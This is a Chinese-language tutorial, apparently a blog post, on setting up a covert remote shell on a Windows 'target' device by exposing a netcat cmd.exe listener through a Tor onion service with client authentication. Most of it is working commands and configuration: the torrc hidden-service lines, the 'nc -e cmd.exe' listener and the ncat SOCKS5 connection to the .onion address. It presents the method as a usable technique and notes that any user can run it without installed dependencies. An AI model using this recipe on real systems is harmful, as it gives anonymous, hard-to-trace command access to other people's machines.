在這篇文章中，我將跟大家分享我的一個小發(fā)現(xiàn)，即如何在Windows平臺中通過Tor Onion服務來開啟遠程Shell 。接下來，話不多說，我們直奔主題。

操作方法

首先，我們要在一個Windows Tor客戶端中創(chuàng)建一個Tor onion服務(即隱藏服務)。我下載了Tor Expert bundle(同樣適用于Tor瀏覽器)-【下載地址】。

然后使用下列命令創(chuàng)建Tor配置文件torrc：

HiddenServiceDir C:demoTorservice HiddenServicePort 8662 127.0.0.1:12345

開啟Tor服務之后，將會自動創(chuàng)建目錄C:demoTorService，并填充一系列必要的文件(<主機名>文件夾包含了這個Toronion服務的.onion地址)。

該onion服務將監(jiān)聽端口8662，而流量將會直接轉發(fā)到127.0.0.1(端口12345)。

這里我們還可以給服務開啟客戶端驗證功能，因為如果不開啟這個功能的話，任何知道這個.onion地址和端口號的人都可以進行連接。最基礎的客戶端驗證使用了共享密鑰，你可以使用下列命令進行配置(torrc)：

HiddenServiceAuthorizeClient basic testuser

這里我選擇使用testuser作為客戶端名稱：

接下來，我們可以使用配置文件torrc來開啟Tor：

tor.exe -f torrc

.onion地址以及客戶端驗證cookie可以在service目錄的<主機名>文件夾中找到：

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

當然了，你一定要保護認證cookie密鑰的安全。

現(xiàn)在，用nc.exe在目標Windows設備上開啟服務(我?guī)啄昵熬驮陔娔X上下載了nc.exe，我不記得原始的URL地址了，我使用的版本是v1.11，MD5為ab41b1e2db77cebd9e2779110ee3915d)：

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor ExpertBundle以及nc.exe不需要任何其他的依賴組件(跟DLL類似)，因此任意用戶都可以直接運行。

現(xiàn)在我們的目標主機已經(jīng)配置好了，在另一臺設備上，我需要使用包含了認證cookie的配置文件來開啟Tor服務：

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

接下來，我們需要運行ncat，因為ncat.exe支持socks5代理(nc.exe不支持)：

ncat.exe –proxy 127.0.0.1:9050 –proxy-type socks5 nybjuivgocveiyeq.onion 8662

接下來，我們就得到遠程Shell啦!

提醒大家一下，這種方法不適用于ncat v 7.60版本，具體原因請參考【這里】：

ibnsock select_loop(): nsock_loop error 10038: An operation was attempted on somethingthat is not a socket.